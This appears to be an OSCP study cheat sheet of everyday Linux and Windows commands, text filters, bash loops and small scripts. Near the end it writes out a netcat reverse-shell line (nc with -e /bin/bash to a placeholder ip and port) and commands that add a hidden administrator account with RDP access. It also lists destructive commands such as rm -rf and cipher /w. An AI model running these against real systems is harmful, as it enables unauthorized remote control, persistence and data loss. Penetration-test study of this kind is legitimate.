OSCP
Linux / Windows Main commands

Linux main commands in OSCP

Find:
find / -name file 2>/dev/null

ls -ltr - Sort the listing by last modified time (-t time, -r reverse).

# Remove a directory recursively together with its content. Very dangerous command!
rm -rf ./directory

# List what rights the current user has with sudo.
sudo -l

# The 2>/dev/null sends all "permission denied" errors to /dev/null.
find / -name file 2>/dev/null

Which
Outputs the path of the binary you are looking for. It searches the directories defined in your $PATH variable.
which bash
# Usually outputs: /bin/bash

Filters
# sort
sort test.txt

# uniq
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName

grep

head

tail

tr

sed
sed "1d"   # delete the first line

# cut
# Given a ping output line such as:
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
# this prints the fourth space-separated field, the IP address (with its trailing colon):
cut -d" " -f4
-d stands for delimiter and -f for field.

tr - Translate
Transform all letters into capital letters:
tr "[:lower:]" "[:upper:]" < file1 > file2

Remove characters
# Remove all dots
cat file.txt | tr -d "."

# Replace all dots with underscores
cat file.txt | tr "." "_"

awk
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse

awk '/172.16.40.10.81/' error.log

awk '{print}' filename

We can use the -F flag to set a custom delimiter: awk -F ':' '{print $1}' test.txt

If you are manipulating some text you might want to start the output with some information about the columns. To do that we can use the BEGIN keyword; likewise END runs once after the last line has been processed.
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
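As an added example that is not part of these notes, the script below chains the filters above (grep, sed, cut, sort -u, and awk with a per-line action plus an END block) over a few constructed sshd log lines to count failed logins per source IP. The log lines, hostname and IP addresses are all made up for the example.

```shell
#!/bin/bash
# Added example: combine the text filters from these notes to summarise failed SSH
# logins. The sample log below is constructed (fake host, users and IPs) so the
# script runs offline.
SAMPLE_LOG='Mar  1 10:00:01 host sshd[101]: Failed password for invalid user admin from 203.0.113.5 port 4411 ssh2
Mar  1 10:00:03 host sshd[102]: Failed password for root from 203.0.113.5 port 4412 ssh2
Mar  1 10:00:07 host sshd[103]: Accepted publickey for alice from 198.51.100.7 port 5001 ssh2
Mar  1 10:00:09 host sshd[104]: Failed password for root from 192.0.2.9 port 6001 ssh2
Mar  1 10:00:11 host sshd[105]: Failed password for invalid user test from 203.0.113.5 port 4413 ssh2'

# Unique source IPs that produced a failed password, sorted, one per line.
# grep keeps the relevant lines, sed strips everything up to "from ",
# cut -d' ' -f1 keeps the first space-separated field (the IP), sort -u dedups.
failed_sources() {
    printf '%s\n' "$SAMPLE_LOG" \
        | grep 'Failed password' \
        | sed 's/.*from //' \
        | cut -d' ' -f1 \
        | sort -u
}

# Number of failed logins per source IP, most frequent first.
# The awk action walks the fields of each matching line and counts the word that
# follows "from"; the END block prints the totals once the whole input is read.
failures_per_ip() {
    printf '%s\n' "$SAMPLE_LOG" | awk '/Failed password/ {
        for (i = 1; i <= NF; i++) if ($i == "from") count[$(i + 1)]++
    } END { for (ip in count) print count[ip], ip }' | sort -rn
}

# Source IPs with at least $1 failed logins, e.g. for a simple brute-force alert.
noisy_sources() {
    failures_per_ip | awk -v t="$1" '$1 >= t { print $2 }'
}

failed_sources
failures_per_ip
noisy_sources 2
```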

# List cronjobs
crontab -l

# Edit or create new cronjobs
crontab -e

# List all devices (disks and partitions)
fdisk -l

# Systemctl
systemctl start ssh
systemctl status ssh
systemctl stop ssh

Netstat - Find outgoing and incoming connections
Netstat is a multiplatform tool, so it works on Mac, Windows and Linux.
$ netstat -antlp

netstat -anpt

# List firewall rules
iptables -L

# Remove one specific rule (here rule number 2 of the INPUT chain)
iptables -D INPUT 2
Iteration over a file
This script will iterate over a file and echo out every single line:
#!/bin/bash

# Note: $(cat file.txt) splits on whitespace, so a line containing spaces is echoed as several items.
for line in $(cat file.txt); do
    echo "$line"
done
Another Way
#!/bin/bash

# Reads the file line by line, so lines containing spaces stay intact.
while read -r p; do
    echo "$p"
done < file.txt
For Loops
#!/bin/bash

for ((i = 0; i < 10; i++)); do
    echo $i
done

Another way to write this is by using the program seq. seq is pretty much like range() in Python, so it can be used like this:

#!/bin/bash

for x in `seq 1 100`; do
    echo $x
done
#!/bin/bash

# Print the last path that locate finds for 646.c
locate 646.c | tail -n 1

Printing the content of that file directly can be done like this:
#!/bin/bash

cat $(locate 646.c | tail -n 1)
VI Operators
VI - Operators
Operators are commands that do things, like delete, change or copy.
c - change
ce - change until the end of the word.
c$ - change until the end of the line.

Combining Motions and Operators
Now that you know some motion commands and operator commands, you can start combining them.
dw - delete word
d$ - delete to the end of the line
Password Creation
# Generate a crypt-style password hash for the string "sam"
openssl passwd sam
Windows Commands
cmd:

Show hidden files:
dir /A

Print out file content, like cat:
type file.txt

grep for a string in files (findstr needs the search string first; "string" is a placeholder):
findstr "string" file.txt

Show network information:
netstat -an

Show network adapter info:
ipconfig

Traceroute:
tracert

List processes:
tasklist

Kill a process:
taskkill /PID 1532 /F

Shreds (overwrites) the free space of the whole C: drive. Destructive!
cipher /w:C:\

Mounting - Mapping
wmic logicaldisk get deviceid, volumename, description
Scripts for fun
Make Request:
import requests

req = requests.get("http://site.com")
print(req.status_code)
print(req.text)

Read and write to files

file_open = open("readme.txt", "r")
for line in file_open:
    print(line.strip("\n"))
    if line.strip("\n") == "rad 4":
        print("last line")
file_open.close()

echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
Add RDP User
Windows
Add RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP via Registry
Enable RDP via registry